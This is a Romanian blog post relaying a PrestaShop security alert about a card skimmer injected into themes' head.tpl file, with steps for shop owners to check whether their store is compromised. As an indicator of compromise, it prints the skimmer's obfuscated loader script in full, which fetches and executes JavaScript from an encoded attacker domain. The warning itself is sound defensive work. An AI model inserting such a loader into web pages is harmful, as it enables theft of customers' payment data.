Alertă de securitate Prestashop

PrestaShop a lansat un comunicat prin care sfătuiește toți detinătorii de magazine online create în platforma lor să facă o serie de verificări de siguranță ale site-urilor .

Comunicatul face referire la un script malițios (“digital skimmer”), responsabil pentru furtul datelor de plată ale clienților .

Acest malware schimbă în mod intenționat butoanele de plată din paginile de finalizare comandă cu altele frauduloase. Când sunt accesate, acestea duc spre o altă pagina externă urmând să copieze și să folosească în mod ilicit datele cardului.

Scriptul este de obicei introdus în fișierul _partials/head.tpl al temei active, ceea ce indică faptul că magazinul a fost compromis.

Recomandare:
Verifică urgent securitatea magazinului PrestaShop și asigura-te că nu a fost afectat.

Echipele tehnice PrestaShop investighează situația pentru a preveni alte incidente.

Cum verifici dacă magazinul este afectat?

În front office:

  1. Deschideți site-ul.
  2. Click dreapta → Inspect / Inspect Element
  3. Caută în cod un tag <script>.

Dacă găsesti un cod similar cu acesta, magazinul este compromis:

<script>(function(){var x=new XMLHttpRequest;x.open('GET',atob('aHR0cHM6Ly9wbHZiLnN1L2J0Lmpz'));x.onload=function(){if(200===x.status)try{Function(x.responseText)()}catch(e){}};x.send();})();</script>

Ce poți face dacă site-ul e compromis?

Dacă observi anomalii sau ai suspiciuni, contacteaza imediat responsabilul (dezvoltatorul) site-ului sau accesează suportul PrestaShop.

Autor Brandusa Moldovan

Sunt membra a echipei Zooku Solutions, iar scopul meu este sa iti ofer informatii folositoare in desfasurarea activitatii, configurarea setarilor site-urilor sau aplicatiilor folosite de acestea.

Email | Web | Twitter | Facebook | Alte articole de

Scrie un comentariu

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.